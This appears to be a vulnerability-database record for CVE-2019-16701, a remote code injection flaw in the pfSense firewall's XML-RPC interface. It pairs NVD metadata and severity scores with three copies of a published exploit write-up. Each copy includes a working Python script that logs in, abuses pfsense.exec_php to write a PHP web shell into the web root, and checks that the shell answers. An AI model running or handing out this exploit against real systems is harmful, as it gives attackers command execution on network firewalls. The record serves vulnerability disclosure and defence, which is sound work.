ID CVE-2019-16701Type cveReporter cve@mitre.orgModified 2019-09-25T19:21:00
Description
pfSense through 2.3.4 through 2.4.4-p3 allows Remote Code Injection via a methodCall XML document with a pfsense.exec_php call containing shell metacharacters in a parameter value.
{"id": "CVE-2019-16701", "bulletinFamily": "NVD", "title": "CVE-2019-16701", "description": "pfSense through 2.3.4 through 2.4.4-p3 allows Remote Code Injection via a methodCall XML document with a pfsense.exec_php call containing shell metacharacters in a parameter value.", "published": "2019-09-25T16:15:00", "modified": "2019-09-25T19:21:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16701", "reporter": "cve@mitre.org", "references": ["http://packetstormsecurity.com/files/154587/pfSense-2.3.4-2.4.4-p3-Remote-Code-Injection.html", "https://hackernews.blog/pfsense-2-3-4-2-4-4-p3-remote-code-injection/#more", "https://github.com/pfsense/pfsense/commits/master"], "cvelist": ["CVE-2019-16701"], "type": "cve", "lastseen": "2020-12-09T21:41:46", "edition": 5, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:154587"]}, {"type": "exploitdb", "idList": ["EDB-ID:47413"]}, {"type": "zdt", "idList": ["1337DAY-ID-33277"]}], "modified": "2020-12-09T21:41:46", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2020-12-09T21:41:46", "rev": 2}, "vulnersScore": 6.3}, "cpe": ["cpe:/a:netgate:pfsense:2.4.4"], "affectedSoftware": [{"cpeName": "netgate:pfsense", "name": "netgate pfsense", "operator": "lt", "version": "2.4.4"}, {"cpeName": "netgate:pfsense", "name": "netgate pfsense", "operator": "eq", "version": "2.4.4"}, {"cpeName": "netgate:pfsense", "name": "netgate pfsense", "operator": "eq", "version": "2.4.4"}, {"cpeName": "netgate:pfsense", "name": "netgate pfsense", "operator": "eq", "version": "2.4.4"}, {"cpeName": "netgate:pfsense", "name": "netgate pfsense", "operator": "eq", "version": "2.4.4"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:netgate:pfsense:2.4.4:p3:*:*:*:*:*:*", "cpe:2.3:a:netgate:pfsense:2.4.4:-:*:*:*:*:*:*", "cpe:2.3:a:netgate:pfsense:2.4.4:p1:*:*:*:*:*:*", "cpe:2.3:a:netgate:pfsense:2.4.4:p2:*:*:*:*:*:*"], "cwe": ["CWE-78"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:netgate:pfsense:2.4.4:-:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:netgate:pfsense:2.4.4:p2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:netgate:pfsense:2.4.4:p3:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:netgate:pfsense:2.4.4:p1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:netgate:pfsense:2.4.4:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.4", "versionStartIncluding": "2.3.4", "vulnerable": true}], "operator": "OR"}]}}
{"zdt": [{"lastseen": "2019-12-04T12:04:21", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-09-25T00:00:00", "title": "Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection Exploit #RCE", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16701"], "modified": "2019-09-25T00:00:00", "id": "1337DAY-ID-33277", "href": "https://0day.today/exploit/description/33277", "sourceData": "# Exploit Title: Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection\r\n# Author: Nassim Asrir\r\n# Vendor Homepage: https://www.pfsense.org/\r\n# Contact: [email\u00a0protected] | https://www.linkedin.com/in/nassim-asrir-b73a57122/\r\n# CVE: CVE-2019-16701\r\n# Tested On: Windows 10(64bit) | Pfsense 2.3.4 / 2.4.4-p3\r\n######################################################################################################\r\n\r\n1 : About Pfsense:\r\n==================\r\n\r\npfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more.\r\n\r\n2 : Technical Analysis:\r\n=======================\r\n\r\nThe pfsense allow users (uid=0) to make remote procedure calls over HTTP (XMLRPC) and the XMLRPC contain some critical methods which allow any authenticated user/hacker to execute OS commands.\r\n\r\nXMLRPC methods:\r\n\r\npfsense.exec_shell\r\npfsense.exec_php\r\npfsense.filter_configure\r\npfsense.interfaces_carp_configure\r\npfsense.backup_config_section\r\npfsense.restore_config_section\r\npfsense.merge_config_section\r\npfsense.merge_installedpackages_section_xmlrpc\r\npfsense.host_firmware_version\r\npfsense.reboot\r\npfsense.get_notices\r\nsystem.listMethods\r\nsystem.methodHelp\r\nsystem.methodSignature\r\n\r\nAs we see in the output we have two interesting methods: pfsense.exec_shell and pfsense.exec_php.\r\n\r\n2 : Static Analysis:\r\n====================\r\n\r\nIn the static analysis we will analysis the xmlrpc.php file. \r\n\r\nLine (73 - 82)\r\n\r\nThis code check if the user have enough privileges.\r\n\r\n$user_entry = getUserEntry($username);\r\n\t\t/*\r\n\t\t * admin (uid = 0) is allowed \r\n\t\t * or regular user with necessary privilege\r\n\t\t */\r\n\t\tif (isset($user_entry['uid']) && $user_entry['uid'] != '0' &&\r\n\t\t !userHasPrivilege($user_entry, 'system-xmlrpc-ha-sync')) {\r\n\t\t\tlog_auth(\"webConfigurator authentication error for '\" .\r\n\t\t\t $username . \"' from \" . $this->remote_addr .\r\n\t\t\t \" not enough privileges\");\r\n\t\t\t\t\r\n\r\nLine (137 - 146)\r\n\r\nThis part of code is the interest for us.\r\n\r\nAs we can see, first we have a check for auth then we have the dangerous function (eval) which take as parametere ($code).\r\n\r\n\tpublic function exec_php($code) {\r\n\t\t$this->auth();\r\n\r\n\t\teval($code);\r\n\t\tif ($toreturn) {\r\n\t\t\treturn $toreturn;\r\n\t\t}\r\n\r\n\t\treturn true;\r\n\t}\r\n\t\r\nLine (155 - 160)\r\n\r\nIn this part of code also we have a check for auth then the execution for ($code)\r\n\t\r\n\tpublic function exec_shell($code) {\r\n\t\t$this->auth();\r\n\r\n\t\tmwexec($code);\r\n\t\treturn true;\r\n\t}\r\n\t\r\n3 - Exploit:\r\n============\r\n\r\n#!/usr/bin/env python\r\n\r\nimport argparse\r\nimport requests\r\nimport urllib2\r\nimport time\r\nimport sys\r\nimport string\r\nimport random\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--rhost\", help = \"Target Uri https://127.0.0.1\")\r\nparser.add_argument(\"--password\", help = \"pfsense Password\")\r\nargs = parser.parse_args()\r\n\r\nrhost = args.rhost\r\npassword = args.password\r\nprint \"\"\r\n\r\nprint \"[+] CVE-2019-16701 - Pfsense - Remote Code Injection\"\r\nprint \"\"\r\nprint \"[+] Author: Nassim Asrir\"\r\nprint \"\"\r\n\r\ncommand = \"<?xml version='1.0' encoding='iso-8859-1'?>\"\r\ncommand += \"<methodCall>\"\r\ncommand += \"<methodName>pfsense.host_firmware_version</methodName>\"\r\ncommand += \"<params>\"\r\ncommand += \"<param><value><string>\"+password+\"</string></value></param>\"\r\ncommand += \"</params>\"\r\ncommand += \"</methodCall>\"\r\n\r\nstage1 = rhost + \"/xmlrpc.php\"\r\n\r\npage = urllib2.urlopen(stage1, data=command).read()\r\n\r\nprint \"[+] Checking Login Creds\"\r\n\r\n\r\nif \"Authentication failed\" in page:\r\n\r\n\tprint \"[-] Wrong password :(\"\r\n\tsys.exit(0)\r\nelse:\r\n\r\n\trandom = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(32)])\r\n\r\n\tprint \"[+] logged in successfully :)\" \r\n\tprint \"[+] Generating random file \"+random+\".php\"\r\n\tprint \"[+] Sending the exploit .....\"\r\n\t\r\n\r\n\tcommand = \"<?xml version='1.0' encoding='iso-8859-1'?>\"\r\n\tcommand += \"<methodCall>\"\r\n\tcommand += \"<methodName>pfsense.exec_php</methodName>\"\r\n\tcommand += \"<params>\"\r\n\tcommand += \"<param><value><string>\"+password+\"</string></value></param>\"\r\n\tcommand += \"<param><value><string>exec('echo \\\\'<pre> <?php $res = system($_GET[\\\"cmd\\\"]); echo $res ?> </pre>\\\\' > /usr/local/www/\"+random+\".php');</string></value></param>\"\r\n\tcommand += \"</params>\"\r\n\tcommand += \"</methodCall>\"\r\n\r\nstage1 = rhost + \"/xmlrpc.php\"\r\n\r\npage = urllib2.urlopen(stage1, data=command).read()\r\n\r\nfinal = rhost+\"/\"+str(random)+\".php\"\r\n\r\ncheck = urllib2.urlopen(final)\r\n\r\nprint \"[+] Checking .....\"\r\n\r\nif check.getcode() == 200:\r\n\r\n\tprint \"[+] Yeah! You got your shell: \" + final+\"?cmd=id\"\r\nelse:\r\n\r\n\tprint \"[+] Sorry :( Shell not found check the path\"\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33277"}], "packetstorm": [{"lastseen": "2019-09-24T22:51:36", "description": "", "published": "2019-09-24T00:00:00", "type": "packetstorm", "title": "pfSense 2.3.4 / 2.4.4-p3 Remote Code Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16701"], "modified": "2019-09-24T00:00:00", "id": "PACKETSTORM:154587", "href": "https://packetstormsecurity.com/files/154587/pfSense-2.3.4-2.4.4-p3-Remote-Code-Injection.html", "sourceData": "`# Exploit Title: Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection \n# Date: 23/09/2018 \n# Author: Nassim Asrir \n# Vendor Homepage: https://www.pfsense.org/ \n# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/ \n# CVE: CVE-2019-16701 \n# Tested On: Windows 10(64bit) | Pfsense 2.3.4 / 2.4.4-p3 \n###################################################################################################### \n \n1 : About Pfsense: \n================== \n \npfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more. \n \n2 : Technical Analysis: \n======================= \n \nThe pfsense allow users (uid=0) to make remote procedure calls over HTTP (XMLRPC) and the XMLRPC contain some critical methods which allow any authenticated user/hacker to execute OS commands. \n \nXMLRPC methods: \n \npfsense.exec_shell \npfsense.exec_php \npfsense.filter_configure \npfsense.interfaces_carp_configure \npfsense.backup_config_section \npfsense.restore_config_section \npfsense.merge_config_section \npfsense.merge_installedpackages_section_xmlrpc \npfsense.host_firmware_version \npfsense.reboot \npfsense.get_notices \nsystem.listMethods \nsystem.methodHelp \nsystem.methodSignature \n \nAs we see in the output we have two interesting methods: pfsense.exec_shell and pfsense.exec_php. \n \n2 : Static Analysis: \n==================== \n \nIn the static analysis we will analysis the xmlrpc.php file. \n \nLine (73 - 82) \n \nThis code check if the user have enough privileges. \n \n$user_entry = getUserEntry($username); \n/* \n* admin (uid = 0) is allowed \n* or regular user with necessary privilege \n*/ \nif (isset($user_entry['uid']) && $user_entry['uid'] != '0' && \n!userHasPrivilege($user_entry, 'system-xmlrpc-ha-sync')) { \nlog_auth(\"webConfigurator authentication error for '\" . \n$username . \"' from \" . $this->remote_addr . \n\" not enough privileges\"); \n \n \nLine (137 - 146) \n \nThis part of code is the interest for us. \n \nAs we can see, first we have a check for auth then we have the dangerous function (eval) which take as parametere ($code). \n \npublic function exec_php($code) { \n$this->auth(); \n \neval($code); \nif ($toreturn) { \nreturn $toreturn; \n} \n \nreturn true; \n} \n \nLine (155 - 160) \n \nIn this part of code also we have a check for auth then the execution for ($code) \n \npublic function exec_shell($code) { \n$this->auth(); \n \nmwexec($code); \nreturn true; \n} \n \n3 - Exploit: \n============ \n \n#!/usr/bin/env python \n \nimport argparse \nimport requests \nimport urllib2 \nimport time \nimport sys \nimport string \nimport random \n \nparser = argparse.ArgumentParser() \nparser.add_argument(\"--rhost\", help = \"Target Uri https://127.0.0.1\") \nparser.add_argument(\"--password\", help = \"pfsense Password\") \nargs = parser.parse_args() \n \nrhost = args.rhost \npassword = args.password \nprint \"\" \n \nprint \"[+] CVE-2019-16701 - Pfsense - Remote Code Injection\" \nprint \"\" \nprint \"[+] Author: Nassim Asrir\" \nprint \"\" \n \ncommand = \"<?xml version='1.0' encoding='iso-8859-1'?>\" \ncommand += \"<methodCall>\" \ncommand += \"<methodName>pfsense.host_firmware_version</methodName>\" \ncommand += \"<params>\" \ncommand += \"<param><value><string>\"+password+\"</string></value></param>\" \ncommand += \"</params>\" \ncommand += \"</methodCall>\" \n \nstage1 = rhost + \"/xmlrpc.php\" \n \npage = urllib2.urlopen(stage1, data=command).read() \n \nprint \"[+] Checking Login Creds\" \n \n \nif \"Authentication failed\" in page: \n \nprint \"[-] Wrong password :(\" \nsys.exit(0) \nelse: \n \nrandom = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(32)]) \n \nprint \"[+] logged in successfully :)\" \nprint \"[+] Generating random file \"+random+\".php\" \nprint \"[+] Sending the exploit .....\" \n \n \ncommand = \"<?xml version='1.0' encoding='iso-8859-1'?>\" \ncommand += \"<methodCall>\" \ncommand += \"<methodName>pfsense.exec_php</methodName>\" \ncommand += \"<params>\" \ncommand += \"<param><value><string>\"+password+\"</string></value></param>\" \ncommand += \"<param><value><string>exec('echo \\\\'<pre> <?php $res = system($_GET[\\\"cmd\\\"]); echo $res ?> </pre>\\\\' > /usr/local/www/\"+random+\".php');</string></value></param>\" \ncommand += \"</params>\" \ncommand += \"</methodCall>\" \n \nstage1 = rhost + \"/xmlrpc.php\" \n \npage = urllib2.urlopen(stage1, data=command).read() \n \nfinal = rhost+\"/\"+str(random)+\".php\" \n \ncheck = urllib2.urlopen(final) \n \nprint \"[+] Checking .....\" \n \nif check.getcode() == 200: \n \nprint \"[+] Yeah! You got your shell: \" + final+\"?cmd=id\" \nelse: \n \nprint \"[+] Sorry :( Shell not found check the path\" \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/154587/pfsense-remote-code-injection.txt"}], "exploitdb": [{"lastseen": "2019-09-24T13:30:03", "description": "", "published": "2019-09-24T00:00:00", "type": "exploitdb", "title": "Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16701"], "modified": "2019-09-24T00:00:00", "id": "EDB-ID:47413", "href": "https://www.exploit-db.com/exploits/47413", "sourceData": "# Exploit Title: Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection\r\n# Date: 23/09/2018\r\n# Author: Nassim Asrir\r\n# Vendor Homepage: https://www.pfsense.org/\r\n# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/\r\n# CVE: CVE-2019-16701\r\n# Tested On: Windows 10(64bit) | Pfsense 2.3.4 / 2.4.4-p3\r\n######################################################################################################\r\n\r\n1 : About Pfsense:\r\n==================\r\n\r\npfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more.\r\n\r\n2 : Technical Analysis:\r\n=======================\r\n\r\nThe pfsense allow users (uid=0) to make remote procedure calls over HTTP (XMLRPC) and the XMLRPC contain some critical methods which allow any authenticated user/hacker to execute OS commands.\r\n\r\nXMLRPC methods:\r\n\r\npfsense.exec_shell\r\npfsense.exec_php\r\npfsense.filter_configure\r\npfsense.interfaces_carp_configure\r\npfsense.backup_config_section\r\npfsense.restore_config_section\r\npfsense.merge_config_section\r\npfsense.merge_installedpackages_section_xmlrpc\r\npfsense.host_firmware_version\r\npfsense.reboot\r\npfsense.get_notices\r\nsystem.listMethods\r\nsystem.methodHelp\r\nsystem.methodSignature\r\n\r\nAs we see in the output we have two interesting methods: pfsense.exec_shell and pfsense.exec_php.\r\n\r\n2 : Static Analysis:\r\n====================\r\n\r\nIn the static analysis we will analysis the xmlrpc.php file. \r\n\r\nLine (73 - 82)\r\n\r\nThis code check if the user have enough privileges.\r\n\r\n$user_entry = getUserEntry($username);\r\n\t\t/*\r\n\t\t * admin (uid = 0) is allowed \r\n\t\t * or regular user with necessary privilege\r\n\t\t */\r\n\t\tif (isset($user_entry['uid']) && $user_entry['uid'] != '0' &&\r\n\t\t !userHasPrivilege($user_entry, 'system-xmlrpc-ha-sync')) {\r\n\t\t\tlog_auth(\"webConfigurator authentication error for '\" .\r\n\t\t\t $username . \"' from \" . $this->remote_addr .\r\n\t\t\t \" not enough privileges\");\r\n\t\t\t\t\r\n\r\nLine (137 - 146)\r\n\r\nThis part of code is the interest for us.\r\n\r\nAs we can see, first we have a check for auth then we have the dangerous function (eval) which take as parametere ($code).\r\n\r\n\tpublic function exec_php($code) {\r\n\t\t$this->auth();\r\n\r\n\t\teval($code);\r\n\t\tif ($toreturn) {\r\n\t\t\treturn $toreturn;\r\n\t\t}\r\n\r\n\t\treturn true;\r\n\t}\r\n\t\r\nLine (155 - 160)\r\n\r\nIn this part of code also we have a check for auth then the execution for ($code)\r\n\t\r\n\tpublic function exec_shell($code) {\r\n\t\t$this->auth();\r\n\r\n\t\tmwexec($code);\r\n\t\treturn true;\r\n\t}\r\n\t\r\n3 - Exploit:\r\n============\r\n\r\n#!/usr/bin/env python\r\n\r\nimport argparse\r\nimport requests\r\nimport urllib2\r\nimport time\r\nimport sys\r\nimport string\r\nimport random\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--rhost\", help = \"Target Uri https://127.0.0.1\")\r\nparser.add_argument(\"--password\", help = \"pfsense Password\")\r\nargs = parser.parse_args()\r\n\r\nrhost = args.rhost\r\npassword = args.password\r\nprint \"\"\r\n\r\nprint \"[+] CVE-2019-16701 - Pfsense - Remote Code Injection\"\r\nprint \"\"\r\nprint \"[+] Author: Nassim Asrir\"\r\nprint \"\"\r\n\r\ncommand = \"<?xml version='1.0' encoding='iso-8859-1'?>\"\r\ncommand += \"<methodCall>\"\r\ncommand += \"<methodName>pfsense.host_firmware_version</methodName>\"\r\ncommand += \"<params>\"\r\ncommand += \"<param><value><string>\"+password+\"</string></value></param>\"\r\ncommand += \"</params>\"\r\ncommand += \"</methodCall>\"\r\n\r\nstage1 = rhost + \"/xmlrpc.php\"\r\n\r\npage = urllib2.urlopen(stage1, data=command).read()\r\n\r\nprint \"[+] Checking Login Creds\"\r\n\r\n\r\nif \"Authentication failed\" in page:\r\n\r\n\tprint \"[-] Wrong password :(\"\r\n\tsys.exit(0)\r\nelse:\r\n\r\n\trandom = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(32)])\r\n\r\n\tprint \"[+] logged in successfully :)\" \r\n\tprint \"[+] Generating random file \"+random+\".php\"\r\n\tprint \"[+] Sending the exploit .....\"\r\n\t\r\n\r\n\tcommand = \"<?xml version='1.0' encoding='iso-8859-1'?>\"\r\n\tcommand += \"<methodCall>\"\r\n\tcommand += \"<methodName>pfsense.exec_php</methodName>\"\r\n\tcommand += \"<params>\"\r\n\tcommand += \"<param><value><string>\"+password+\"</string></value></param>\"\r\n\tcommand += \"<param><value><string>exec('echo \\\\'<pre> <?php $res = system($_GET[\\\"cmd\\\"]); echo $res ?> </pre>\\\\' > /usr/local/www/\"+random+\".php');</string></value></param>\"\r\n\tcommand += \"</params>\"\r\n\tcommand += \"</methodCall>\"\r\n\r\nstage1 = rhost + \"/xmlrpc.php\"\r\n\r\npage = urllib2.urlopen(stage1, data=command).read()\r\n\r\nfinal = rhost+\"/\"+str(random)+\".php\"\r\n\r\ncheck = urllib2.urlopen(final)\r\n\r\nprint \"[+] Checking .....\"\r\n\r\nif check.getcode() == 200:\r\n\r\n\tprint \"[+] Yeah! You got your shell: \" + final+\"?cmd=id\"\r\nelse:\r\n\r\n\tprint \"[+] Sorry :( Shell not found check the path\"", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47413"}]}
